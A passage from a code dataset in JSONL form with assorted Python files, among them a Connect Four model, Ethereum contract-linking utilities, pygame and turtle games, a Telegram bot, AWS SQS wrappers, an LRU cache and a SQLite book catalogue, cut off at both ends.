return True\n\n def next_player(self):\n if self.__turn == PLAYER1:\n self.__turn = PLAYER2\n else:\n self.__turn = PLAYER1\n\n def get_turn(self):\n return self.__turn\n\n def get_grid(self):\n return self.__grid\n\n def get_valid_moves(self):\n return [(self.__grid[x][0] == EMPTY) for x in range(7)]\n\n def register_grid_observer(self, o):\n self.__grid_observers.append(o)\n\n def register_result_observer(self, o):\n self.__result_observers.append(o)\n\n def remove_grid_observer(self, o):\n try:\n self.__grid_observers.remove(o)\n except ValueError:\n pass\n\n def remove_result_observer(self, o):\n try:\n self.__result_observers.remove(o)\n except ValueError:\n pass\n","sub_path":"AIPrj2/AIProject 2 Instructions/python/c4model.py","file_name":"c4model.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"452460422","text":"import itertools\nimport os\nimport json\nimport re\nimport functools\n\nimport toposort\n\nfrom web3.utils.formatting import (\n remove_0x_prefix,\n)\nfrom web3.utils.string import (\n coerce_args_to_text,\n)\n\nfrom populus.utils.functional import (\n compose,\n)\nfrom .filesystem import (\n get_compiled_contracts_file_path,\n)\n\n\ndef package_contracts(contract_classes):\n _dict = {\n '__len__': lambda s: len(contract_classes),\n '__iter__': lambda s: iter(contract_classes.items()),\n '__contains__': lambda s, k: contract_classes.__contains__(k),\n '__getitem__': lambda s, k: contract_classes.__getitem__(k),\n '__setitem__': lambda s, k, v: contract_classes.__setitem__(k, v),\n 'keys': lambda s: contract_classes.keys(),\n 'values': lambda s: contract_classes.values(),\n }\n _dict.update(contract_classes)\n\n return type('contracts', (object,), _dict)()\n\n\ndef construct_contract_factories(web3, contracts):\n constructor_kwargs = {\n contract_name: {\n 'code': contract_data.get('code'),\n 'code_runtime': contract_data.get('code_runtime'),\n 'abi': contract_data.get('abi'),\n 'source': contract_data.get('source'),\n 'address': contract_data.get('address'),\n } for contract_name, contract_data in contracts.items()\n }\n contract_classes = {\n name: web3.eth.contract(**contract_data)\n for name, contract_data in constructor_kwargs.items()\n }\n return package_contracts(contract_classes)\n\n\ndef load_compiled_contract_json(project_dir):\n compiled_contracts_path = get_compiled_contracts_file_path(project_dir)\n\n if not os.path.exists(compiled_contracts_path):\n raise ValueError(\"No compiled contracts found\")\n\n with open(compiled_contracts_path) as contracts_file:\n contracts = json.loads(contracts_file.read())\n\n return contracts\n\n\nDEPENDENCY_RE = re.compile((\n '__' # Prefixed by double underscore\n '(?P[a-zA-Z_](?:[a-zA-Z0-9_]{0,34}[a-zA-Z0-9])?)' # capture the name of the dependency\n '_{0,35}'\n '__' # End with a double underscore\n))\n\n\n@coerce_args_to_text\ndef find_link_references(bytecode):\n \"\"\"\n Given bytecode, this will return all of the unlinked references from within\n the bytecode.\n\n The returned names may be truncated to 36 characters.\n \"\"\"\n return set(DEPENDENCY_RE.findall(bytecode))\n\n\ndef make_link_regex(contract_name):\n \"\"\"\n Returns a regex that will match embedded link references within a\n contract's bytecode.\n \"\"\"\n return re.compile(\n contract_name[:36].ljust(38, \"_\").rjust(40, \"_\")\n )\n\n\ndef expand_shortened_reference_name(name, full_names):\n \"\"\"\n If a contract dependency has a name longer than 36 characters then the name\n is truncated in the compiled but unlinked bytecode. This maps a name to\n it's full name.\n \"\"\"\n if name in full_names:\n return name\n\n candidates = [\n n for n in full_names if n.startswith(name)\n ]\n if len(candidates) == 1:\n return candidates[0]\n elif len(candidates) > 1:\n raise ValueError(\n \"Multiple candidates found trying to expand '{0}'. Found '{1}'. \"\n \"Searched '{2}'\".format(\n name,\n ','.join(candidates),\n ','.join(full_names),\n )\n )\n else:\n raise ValueError(\n \"Unable to expand '{0}'. \"\n \"Searched '{1}'\".format(\n name,\n ','.join(full_names),\n )\n )\n\n\ndef link_bytecode(bytecode, **dependencies):\n \"\"\"\n Given the bytecode for a contract, and it's dependencies in the form of\n {contract_name: address} this functino returns the bytecode with all of the\n link references replaced with the dependency addresses.\n \"\"\"\n linker_fn = compose(*(\n functools.partial(\n make_link_regex(name).sub,\n remove_0x_prefix(address),\n )\n for name, address in dependencies.items()\n ))\n linked_bytecode = linker_fn(bytecode)\n return linked_bytecode\n\n\ndef get_contract_library_dependencies(bytecode, full_contract_names):\n \"\"\"\n Given a contract bytecode and an iterable of all of the known full names of\n contracts, returns a set of the contract names that this contract bytecode\n depends on.\n\n To get the full dependency graph use the `get_recursive_contract_dependencies`\n function.\n \"\"\"\n expand_fn = functools.partial(\n expand_shortened_reference_name,\n full_names=full_contract_names,\n )\n return {\n expand_fn(name) for name in find_link_references(bytecode)\n }\n\n\ndef get_shallow_dependency_graph(contracts):\n \"\"\"\n Given a dictionary of compiled contract data, this returns a *shallow*\n dependency graph of each contracts explicit link dependencies.\n \"\"\"\n dependencies = {\n contract_name: get_contract_library_dependencies(\n contract_data['code'],\n contracts.keys(),\n )\n for contract_name, contract_data\n in contracts.items()\n if contract_data.get('code') is not None\n }\n return dependencies\n\n\ndef get_contract_deploy_order(dependency_graph):\n return toposort.toposort_flatten(dependency_graph)\n\n\ndef get_recursive_contract_dependencies(contract_name, dependency_graph):\n \"\"\"\n Recursive computation of the linker dependencies for a specific contract\n within a contract dependency graph.\n \"\"\"\n return set(itertools.chain(\n dependency_graph.get(contract_name, set()), *(\n get_recursive_contract_dependencies(dep, dependency_graph)\n for dep in dependency_graph.get(contract_name, set())\n )\n ))\n","sub_path":"populus/utils/contracts.py","file_name":"contracts.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"110717873","text":"import sys\nimport pygame\nfrom pygame.time import Clock\nfrom pygame.locals import *\nfrom support import load_image, load_sound\nfrom math import pi\n\nfrom secs import World\n\npygame.init()\nsurface = pygame.display.set_mode((468, 69))\npygame.display.set_caption('Monkey SECS Fever')\nclock = Clock()\n\ncontext = dict()\nevents = list()\ncontext[\"events\"] = events\n\nimages = list()\nimages.append(load_image(\"chimp.bmp\", -1))\nimages.append(pygame.transform.flip(images[0], 1, 0))\nimages.append(load_image(\"fist.bmp\", -1))\n\nsounds = list()\nsounds.append(load_sound(\"punch.wav\"))\nsounds.append(load_sound(\"whiff.wav\"))\n\nw = World()\n\nw.define_component(\"blitable\", {\"image_id\": 0})\nw.define_component(\"position\", {\"x\": 0, \"y\": 0, \"z\": 0})\nw.define_component(\"velocity\", {\"pixels_per_ms\": 0.0})\nw.define_component(\"rotation\", {\"base_angle\": pi / 2,\n \"angle\": pi / 2,\n \"degrees\": 0,\n \"rot_direction\": 0,\n \"rads_per_ms\": pi / 48})\nw.define_component(\"slide_toggle\", {\"min_x\": 0, \"max_x\": 0, \"direction\": 1})\n\n# Index blitable entities to make rendering more efficient\nblitable_mask = w.add_entity_index(\"blitable\")\n\n\ndef rotation_system_handler(state, entity, delta):\n if entity.rot_direction != 0:\n entity.angle += entity.rads_per_ms * entity.direction\n if entity.angle < 0 or entity.angle > pi * 2:\n entity.angle = entity.base_angle\n entity.rot_direction = 0\n entity.degrees = 0\n entity.degrees = entity.angle * (180.0 / pi)\n\nw.define_system(\n None,\n rotation_system_handler,\n \"rotation\"\n)\n\n\ndef slide_toggle_system(state, entity, delta):\n if entity.x > entity.max_x:\n entity.direction *= -1\n entity.image_id = 1\n entity.x = entity.max_x\n elif entity.x < entity.min_x:\n entity.direction *= -1\n entity.image_id = 0\n entity.x = entity.min_x\n else:\n entity.x += entity.direction * entity.pixels_per_ms\n\n\nw.define_system(\n None,\n slide_toggle_system,\n \"position\", \"velocity\", \"slide_toggle\"\n)\n\nfist_id = w.make_entity(\"position\", \"blitable\")\nw.set_entity_properties(fist_id, **{\n \"image_id\": 2,\n \"x\": 0,\n \"y\": 0,\n \"z\": 1\n})\n\nchimp_id = w.make_entity(\"position\", \"velocity\", \"slide_toggle\", \"blitable\", \"rotation\")\nw.set_entity_properties(chimp_id, **{\n \"image_id\": 0,\n \"x\": 0,\n \"y\": 0,\n \"z\": 0,\n \"min_x\": 0,\n \"max_x\": 414,\n \"pixels_per_ms\": 3\n})\n\n\npygame.mouse.set_visible(0)\nw.process_entities(0)\n\nacc = 0\nwhile True:\n del events[:]\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEMOTION:\n w.set_entity_properties(fist_id, **{\"x\": event.pos[0] - 28, \"y\": event.pos[1] - 5})\n elif event.type == MOUSEBUTTONDOWN:\n chimp_rect = Rect(w.get_entity_properties(chimp_id, \"x\", \"y\"), (54, 79))\n fist_rect = Rect(w.get_entity_properties(fist_id, \"x\", \"y\"), (42, 75))\n if chimp_rect.colliderect(fist_rect):\n sounds[0].play()\n w.set_entity_properties(chimp_id, **{\"rot_direction\": 1})\n else:\n sounds[1].play()\n\n delta = clock.tick(60)\n acc += delta\n if acc > 3000:\n acc = 0\n print(\"FPS = %s\" % clock.get_fps())\n w.process_entities(delta)\n\n surface.fill(0)\n for entity in sorted(w.entity_index[blitable_mask], key=lambda e: e.z):\n if w.entity_has_components(entity, \"rotation\") and entity.rot_direction != 0:\n surface.blit(pygame.transform.rotate(images[entity.image_id], entity.degrees), (entity.x, entity.y))\n else:\n surface.blit(images[entity.image_id], (entity.x, entity.y))\n\n pygame.display.flip()\n","sub_path":"chimp.py","file_name":"chimp.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"539013219","text":"# File for handlers which provide information\n\nimport pandas as pd\n\nfrom setup_database import open_close_database\n\nfrom telegram.ext import CommandHandler\n\n\ndef get_info_handlers():\n return [\n CommandHandler('my_stickers', my_stickers),\n CommandHandler('my_packs', my_packs)\n ]\n\n\n@open_close_database\ndef my_stickers(update, context, mydb, mycursor):\n user_id = update.message.from_user.id\n sql = '''\n select\n t2.pack_name,\n t3.sticker_shortcut\n from user_packs t1\n\n inner join pack_info t2\n on true\n and t1.user_id = %s\n and t1.pack_id = t2.pack_id\n\n inner join pack_stickers t3\n on t1.pack_id = t3.pack_id\n ;'''\n val = (user_id,)\n mycursor.execute(sql, val)\n\n pack_shortcut = mycursor.fetchall()\n pack_sticker_list = pd.DataFrame(\n pack_shortcut,\n columns=['pack_name', 'sticker_shortcut']).groupby('pack_name')[\n 'sticker_shortcut'\n ].apply(lambda x: x.tolist()).reset_index().values.tolist()\n\n answer = '\\n\\n'.join(\n f'{pack}:\\n' + '\\n'.join(stickers)\n for pack, stickers in pack_sticker_list)\n\n update.message.reply_text(\n f'These are stickers you can currently use \\\nsorted by packs:\\n\\n{answer}',\n parse_mode='html')\n\n\n@open_close_database\ndef my_packs(update, context, mydb, mycursor):\n user_id = update.message.from_user.id\n answer = get_user_packs(user_id=user_id)\n\n update.message.reply_text(\n f'These are names and ids of packs you can currently use:\\n\\n{answer}')\n\n\n@open_close_database\ndef get_user_packs(user_id, mydb, mycursor):\n sql = '''\n select\n t1.pack_id,\n t2.pack_name\n from user_packs t1\n\n inner join pack_info t2\n on true\n and t1.user_id = %s\n and t1.pack_id = t2.pack_id\n '''\n val = (user_id,)\n mycursor.execute(sql, val)\n pack_id_name = mycursor.fetchall()\n\n answer = '\\n'.join([\n f'{pack_name}: {pack_id}' for pack_id, pack_name in pack_id_name\n ])\n return answer\n","sub_path":"info_handlers.py","file_name":"info_handlers.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90514352","text":"\"\"\"\nAWS SQS Interfaces\n~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nimport logging\nfrom typing import Dict, Any, Optional, AsyncGenerator\n\nimport botocore.exceptions\nfrom pyapp_ext.aiobotocore import aio_create_client\nfrom pyapp_ext.messaging.aio import MessageSender, MessageReceiver, Message\nfrom pyapp_ext.messaging.exceptions import QueueNotFound, ClientError\n\nfrom .utils import parse_attributes, build_attributes\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass SQSBase:\n \"\"\"\n Base Message Queue\n \"\"\"\n\n __slots__ = (\"queue_name\", \"aws_config\", \"client_args\", \"_client\", \"_queue_url\", \"loop\")\n\n def __init__(\n self,\n *,\n queue_name: str,\n aws_config: str = None,\n client_args: Dict[str, Any] = None,\n ):\n self.queue_name = queue_name\n self.aws_config = aws_config\n self.client_args = client_args or {}\n\n self._client = None\n self._queue_url: Optional[str] = None\n\n def __repr__(self):\n return f\"{type(self).__name__}(queue_name={self.queue_name!r})\"\n\n async def open(self):\n \"\"\"\n Open queue\n \"\"\"\n client = await aio_create_client(\"sqs\", self.aws_config, **self.client_args)\n\n try:\n response = await client.get_queue_url(QueueName=self.queue_name)\n\n except botocore.exceptions.ClientError as ex:\n await client.close()\n\n error_code = ex.response[\"Error\"][\"Code\"]\n if error_code == \"AWS.SimpleQueueService.NonExistentQueue\":\n raise QueueNotFound(f\"Unable to find queue `{self.queue_name}`\")\n\n raise ClientError(error_code) from ex\n\n except Exception as ex:\n await client.close()\n raise ClientError() from ex\n\n self._client = client\n self._queue_url = response[\"QueueUrl\"]\n\n async def close(self):\n \"\"\"\n Close the queue\n \"\"\"\n if self._client:\n await self._client.close()\n self._client = None\n\n self._queue_url = None\n\n async def configure(self):\n \"\"\"\n Define any send queues\n \"\"\"\n async with await aio_create_client(\"sqs\", self.aws_config, **self.client_args) as client:\n try:\n response = await client.create_queue(QueueName=self.queue_name)\n\n except botocore.exceptions.ClientError as ex:\n error_code = ex.response[\"Error\"][\"Code\"]\n raise ClientError(error_code) from ex\n\n except Exception as ex:\n raise ClientError() from ex\n\n return response[\"QueueUrl\"]\n\n\nclass SQSSender(SQSBase, MessageSender):\n \"\"\"\n Message sending interface for SQS\n \"\"\"\n\n __slots__ = ()\n\n async def send_raw(self, body: bytes, *, content_type: str = None, content_encoding: str = None) -> str:\n \"\"\"\n Publish a raw message (message is raw bytes)\n \"\"\"\n attributes = build_attributes(\n ContentType=content_type, ContentEncoding=content_encoding\n )\n response = await self._client.send_message(\n QueueUrl=self._queue_url, MessageBody=body, MessageAttributes=attributes\n )\n return response[\"MessageId\"]\n\n\nclass SQSReceiver(SQSBase, MessageReceiver):\n \"\"\"\n Message receiving for SQS\n \"\"\"\n\n __slots__ = (\"wait_time\",)\n\n def __init__(self, *, wait_time: int = 10, **kwargs):\n super().__init__(**kwargs)\n self.wait_time = wait_time\n\n async def handle_invalid_message(self, message: Message):\n \"\"\"\n Handle an invalid message\n \"\"\"\n\n async def receive_raw(self) -> AsyncGenerator[Message, None]:\n \"\"\"\n Start receiving raw responses from the queue\n \"\"\"\n queue_name = self.queue_name\n client = self._client\n queue_url = self._queue_url\n\n LOGGER.debug(\"Starting SQS Listener: %s\", queue_name)\n\n while True:\n response = await client.receive_message(\n QueueUrl=queue_url,\n WaitTimeSeconds=self.wait_time,\n MessageAttributeNames=[\"ContentType\", \"ContentEncoding\"],\n )\n\n if \"Messages\" in response:\n for msg in response[\"Messages\"]:\n try:\n attrs = parse_attributes(\n msg[\"MessageAttributes\"]\n )\n except KeyError:\n attrs = {}\n\n yield Message(\n msg.get(\"Body\"),\n attrs.get(\"ContentType\"),\n attrs.get(\"ContentEncoding\"),\n msg,\n self\n )\n\n else:\n LOGGER.debug(\"No messages in queue %s\", queue_name)\n\n async def delete(self, message: Message):\n \"\"\"\n Delete a message from the queue (eg after successfully processing)\n \"\"\"\n await self._client.delete_message(\n QueueUrl=self._queue_url,\n ReceiptHandle=message.envelope[\"ReceiptHandle\"]\n )\n","sub_path":"pyapp_ext/messaging_aws/aio/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"233174864","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\nX_COR = 300\nY_COR_LIST = []\nY_COR = 250\nfor y in range(8):\n Y_COR_LIST.append(Y_COR)\n Y_COR -= 65\n\nclass CarManager(Turtle):\n def __init__(self):\n super().__init__()\n self.car_speed = STARTING_MOVE_DISTANCE\n self.penup()\n self.hideturtle()\n self.last_y = 0\n self.all_cars = []\n\n def create_car(self):\n new_car = Turtle()\n new_car.penup()\n new_car.color(random.choice(COLORS))\n new_car.shape('square')\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.x_cor = X_COR\n new_car.y_cor = random.choice(Y_COR_LIST)\n while new_car.y_cor == self.last_y:\n new_car.y_cor = random.choice(Y_COR_LIST)\n self.last_y = new_car.y_cor\n new_car.goto(new_car.x_cor,new_car.y_cor)\n self.all_cars.append(new_car)\n\n def move(self):\n for car in self.all_cars:\n car.backward(self.car_speed)\n\n def speed_up(self):\n self.car_speed += MOVE_INCREMENT\n\n","sub_path":"Turtle_Crossing/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49702816","text":"#### 꼼수 방법 #####\n\n\nT=int(input())\ndef find_set(num):\n visited[num]=1 ### 들어오면 방문을 했다고 표시한다.\n\n for next_ind in graph[num]: ### 그리고 그 그래프 내에 있는 값을 끄집어내어,\n if visited[next_ind]==0: ### 방문을 안했으면,\n find_set(next_ind) ### 다 방문을 해준다.\n \n\n\n\n\nfor tc in range(1,T+1):\n N,M = map(int,input().split())\n graph = [[] for _ in range(N+1)]\n visited = [0]*(N+1) ### 방문을 표시\n arr = list(map(int,input().split()))\n for i in range(M):\n x = arr[2*i]\n y = arr[2*i+1]\n graph[x].append(y) ### 부모 자식노드에 둘다 추가해준다.\n graph[y].append(x)\n cnt = 0\n for i in range(1,N+1):\n if graph[i] and visited[i]==0: ### 방문하지 않았고, graph가 있으면 탐색을 한다.\n find_set(i) \n cnt+=1 ### 한번 들어오면 연결된 모든 노드를 탐색하기 때문에 그게 한 집합이 된다. 그래서 +1 을 해준다.\n elif not graph[i]: ### graph에 아무것도 없으면 단독노드이므로 +1 을 해준다.\n cnt+=1\n print('#{} {}'.format(tc,cnt))","sub_path":"휴강기간_공부/알고리즘_0309/swea_5248_그룹나누기.py","file_name":"swea_5248_그룹나누기.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"246945954","text":"#!/usr/bin/python\n\nfrom pylab import *\n\n#hak5.txt\n\nsize = [1, 2, 4, 8, 12]\n\ntotaltime2 = [11.87, 13.553340, 12.626770, 12.345234, 13.721334]\ntotaltime3 = [11.87, 6.123, 3.1, 1.72, 1.3]\n\nspeedup2, = plot(size, totaltime2, 'g', label='MPI')\nspeedup3, = plot(size, totaltime3, 'r', label='MPI WITH HDF5')\nplot(size, totaltime2)\nplot(size, totaltime3)\n\nxlabel('Total number of processors used')\nylabel('Read time in seconds')\ntitle('Comparison of serial and parallel HDF5 read\\non Intel Xeon CPU X5660 @ 2.80GHz 12288 KB Cache')\nlegend2 = legend([speedup2], [\"Serial Read\"], loc=3)\nlegend3 = legend([speedup3], [\"Parallel Read w/ HDF5\"], loc=4)\ngca().add_artist(legend2)\ngca().add_artist(legend3)\ngrid(True)\nsavefig(\"serial_hdf5_read.png\")\nshow()\n\n","sub_path":"report/read-serial-parallel.py","file_name":"read-serial-parallel.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"346752738","text":"import time\nimport concurrent.futures\n\nstart = time.perf_counter()\n\n\ndef do_something(seconds):\n print(f\"sleeping {seconds} sec...\")\n time.sleep(seconds)\n return f\"done sleeping...{seconds}\"\n\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n # context manager\n # f1 = executor.submit(do_something, 1) # arg = 1\n # print(f1.result())\n\n secs = [5, 3, 4, 2, 1]\n\n # results = [executor.submit(do_something, sec) for sec in secs]\n # for f in concurrent.futures.as_completed(results):\n # print(f.result())\n\n results = executor.map(do_something, secs)\n for result in results:\n print(result)\n\nfinish = time.perf_counter()\n\nprint(f\"finished in {round(finish-start, 2)} seconds(s)\")\n\n# finished all the threads in almost 1.5 sec\n","sub_path":"threads/basics/hello-concurrent.py","file_name":"hello-concurrent.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"600576393","text":"# 运用你所掌握的数据结构,设计和实现一个  LRU (最近最少使用) 缓存机制。它应该支持以下操作: 获取数据 get 和 写入数据 put 。\n#\n# 获取数据 get(key) - 如果密钥 (key) 存在于缓存中,则获取密钥的值(总是正数),否则返回 -1。\n# 写入数据 put(key, value) - 如果密钥不存在,则写入其数据值。当缓存容量达到上限时,它应该在写入新数据之前删除最近最少使用的数据值,从而为新的数据值留出空间\n\n\nclass ListNode:\n def __init__(self, key=None, value=None):\n self.value = value\n self.key = key\n self.next = None\n self.pre = None\n\n\nclass LRUCache:\n def __init__(self, capacity):\n self.capacity = capacity\n self.hashmap = {}\n self.pre = None\n self.next = None\n\n # 建立双向链表\n self.head = ListNode()\n self.tail = ListNode()\n self.head.next = self.tail\n self.tail.pre = self.head\n\n def add_node_to_head(self, key, value):\n new = ListNode(key, value)\n self.hashmap[key] = new\n new.pre = self.head\n new.next = self.head.next\n\n self.head.next.pre = new\n self.head.next = new\n\n def move_node_to_head(self, key):\n node = self.hashmap[key]\n # 先把node拿出来\n node.pre.next = node.next\n node.next.pre = node.pre\n # 再把node放到开头\n node.pre = self.head\n node.next = self.head.next\n\n self.head.next.pre = node\n self.head.next = node\n\n def pop_tail(self):\n last_node = self.tail.pre\n self.hashmap.pop(last_node.key)\n last_node.pre.next = self.tail\n self.tail.pre = last_node.pre\n return last_node\n\n def get(self, key):\n if key in self.hashmap:\n self.move_node_to_head(key)\n res = self.hashmap.get(key, -1)\n if res == -1:\n return res\n else:\n return res.value\n\n def put(self, key, value):\n if key in self.hashmap:\n self.hashmap[key].value = value\n self.move_node_to_head(key)\n else:\n if len(self.hashmap) >= self.capacity:\n self.pop_tail()\n self.add_node_to_head(key, value)\n\n\n\n\n\n\n\n","sub_path":"leetcode146_LRU缓存机制.py","file_name":"leetcode146_LRU缓存机制.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"498699169","text":"# -*- coding=utf-8 -*-\n\nfrom toolkit.web_framework.dispatcher import Dispatcher\nfrom model.connection import dbmanager\nfrom model.orm.wechat_profile import WechatProfile\n\n\nclass Demo(Dispatcher):\n\n cls_url = 'demo'\n\n def show(self):\n return ([{'welcome': \"Hello World\"}], '', 'json', '0', '', '', '')\n\n def get_nickname(self):\n _id = \"cbc6706c-5ab9-464c-a6b7-4d28dd464976\"\n res = dbmanager.query(WechatProfile).filter_by(id=_id).first()\n return ([{'nickname': res.nickname}], '', 'json', '0', '', '', '')\n","sub_path":"backend/api/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"115413713","text":"class Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n while k > len(nums):\n k -= len(nums)\n if k == 0:\n return\n l = len(nums) - k\n for i in range(l // 2):\n tmp = nums[i]\n nums[i] = nums[l - 1 - i]\n nums[l - 1 - i] = tmp\n for i in range(k // 2):\n tmp = nums[l + i]\n nums[l + i] = nums[-1 - i]\n nums[-1 - i] = tmp\n for i in range(len(nums) // 2):\n tmp = nums[i]\n nums[i] = nums[-1 - i]\n nums[-1 - i] = tmp\n","sub_path":"leetcode/0101-0200/0189_O(1)space.py","file_name":"0189_O(1)space.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"603862873","text":"import sqlite3 as sql\nimport time\nclass book_implemetion:\n\n def __init__(self,name=\"\",writer=\"\",publisher=\"\",book_type=\"\",year=None,id=\"\"):\n self.name=name\n self.writer=writer\n self.publisher=publisher\n self.book_type=book_type\n self.year=year\n self.id=id\n\n def __str__(self):\n return \"Name: {}\\nwriter: {}\\npublisher: {}\\nbook_type: {}\\nyear: {}\\nId: {}\\n\".format(self.name,self.writer,\n self.publisher,self.book_type,self.year,self.id)\n\nclass Book_Data_base:\n\n def __init__(self):\n self.baglanti_olustur()\n\n def baglanti_olustur(self):\n self.con=sql.connect(\"Books.db\",timeout=10)\n self.imlec=self.con.cursor()\n sorgu = \"Create Table If not Exists Books(name TEXT ,writer TEXT,publisher TEXT,book_type TEXT,year INT ,id TEXT)\"\n self.imlec.execute(sorgu)\n self.con.commit()\n\n def baglanti_kes(self):\n self.con.close()\n\n def Insert_data(self,book):\n sorgu=\"Insert Into Books values(?,?,?,?,?,?)\"\n self.imlec.execute(sorgu, (book.name, book.writer, book.publisher,book.book_type,book.year,book.id))\n self.con.commit()\n\n def Ask_Book(self,name):\n self.imlec.execute(\"Select * From Books where name = ?\",(name,))\n books=self.imlec.fetchall()\n if(len(books)==0):\n print(\"There is no exists same of this Books\")\n else:\n book=book_implemetion(books[0][0],books[0][1],books[0][2],books[0][3],books[0][4],books[0][5])\n print(book)\n\n def buy_Book(self,id):\n self.imlec.execute(\"Select * From Books where id = ?\",(id,))\n Books=self.imlec.fetchall()\n if(len(Books)==0):\n print(\"There is no exists same of this product\")\n else:\n Book=book_implemetion(Books[0][4])\n\n self.take += 1\n print(Book)\n\n def Show_Books(self):\n self.imlec.execute(\"Select * From Books\")\n show_books=self.imlec.fetchall()\n if(len(show_books)==0):\n print(\"There is no exists Books\")\n else:\n for data in show_books:\n print(book_implemetion(data[0],data[1],data[2],data[3],data[4],data[5]))\n\n\n def Count_Books(self):\n self.imlec.execute(\"Select * From Books\")\n count_books=self.imlec.fetchall()\n count=0\n for data in count_books:\n count+=1\n print(count)\n\n\n def Delet_column(self):\n self.imlec.execute(\"DELETE from Books2 Wahidi1\")\n print(\"Your column was deleted\")\n","sub_path":"proje.py","file_name":"proje.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"358803992","text":"import time\n\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\n# Since both files are read into a list i'm going to use a set type.\n\n# Python Docs:\n# intersection(*others)\n# set & other & ...\n# Return a new set with elements common to the set and all others.\n\n# So duplicates will be set to the common intersection of the names list\n# Oh wait nevermind I can't use this hmm\n# duplicates = set(names_1).intersection(names_2)\n\n# Maybe I'll try differnt for loop configurations\n# Declare dups\nduplicates = [name for name in names_1 if name in names_2] # maybe I can use a comprehension\n\n# for name_1 in names_1:\n# for name_2 in names_2:\n# if name_1 == name_2:\n# duplicates.append(name_1)\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"344597294","text":"__author__ = 'haim.levy@post.idc.ac.il'\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport random\n\nfrom Base import *\nfrom DeviceTagsLoader import *\n\noracle_fn = 'seen_oracle.csv'\nSAMPLES_IN_DIR = '../2_fdb2features/seen_samples/'\nALL_IN_DIR = '../2_fdb2features/seen_all/'\nOUT_MAIN = './seen_w_all_folds/'\nOUT_TRAIN = 'train/'\nOUT_TEST = 'test/'\n\n\ndef get_len(oracle, isiot):\n ln = 0\n for dev in oracle.values():\n if int(dev.isiot) == int(isiot):\n ln += 1\n return ln\n\n\ndef get_lengthes(oracle, train_ratio):\n iot_len, not_len = get_len(oracle, 1), get_len(oracle, 0)\n train_iot_len = int(round(iot_len * train_ratio))\n test_iot_len = int(round(iot_len * (1 - train_ratio)))\n if train_iot_len + test_iot_len > iot_len:\n test_iot_len -= 1\n train_not_len = int(round(not_len * train_ratio))\n test_not_len = int(round(not_len * (1 - train_ratio)))\n if train_not_len + test_not_len > not_len:\n test_not_len -= 1\n\n return train_iot_len, test_iot_len, train_not_len, test_not_len\n\n\ndef get_keys(oracle):\n iot_keys = []\n not_keys = []\n for dev in oracle.values():\n if dev.isiot == 0:\n not_keys.append(dev.mac)\n else:\n iot_keys.append(dev.mac)\n random.shuffle(iot_keys)\n random.shuffle(iot_keys)\n random.shuffle(iot_keys)\n random.shuffle(not_keys)\n random.shuffle(not_keys)\n random.shuffle(not_keys)\n return iot_keys, not_keys\n\n\ndef split_devs(oracle, train_ratio=0.8):\n train_oracle = {}\n test_oracle = {}\n train_iot_len, test_iot_len, train_not_len, test_not_len = get_lengthes(oracle, train_ratio)\n iot_keys, not_keys = get_keys(oracle)\n\n train_iot_keys = iot_keys[:train_iot_len]\n train_not_keys = not_keys[:train_not_len]\n\n test_iot_keys = iot_keys[train_iot_len:]\n test_not_keys = not_keys[train_not_len:]\n\n for k, v in oracle.items():\n if k in train_iot_keys or k in train_not_keys:\n train_oracle[k] = v\n if k in test_iot_keys or k in test_not_keys:\n test_oracle[k] = v\n\n return train_oracle, test_oracle\n\n\ndef make_folds(oracle):\n folds = []\n iot_k, not_k = get_keys(oracle)\n 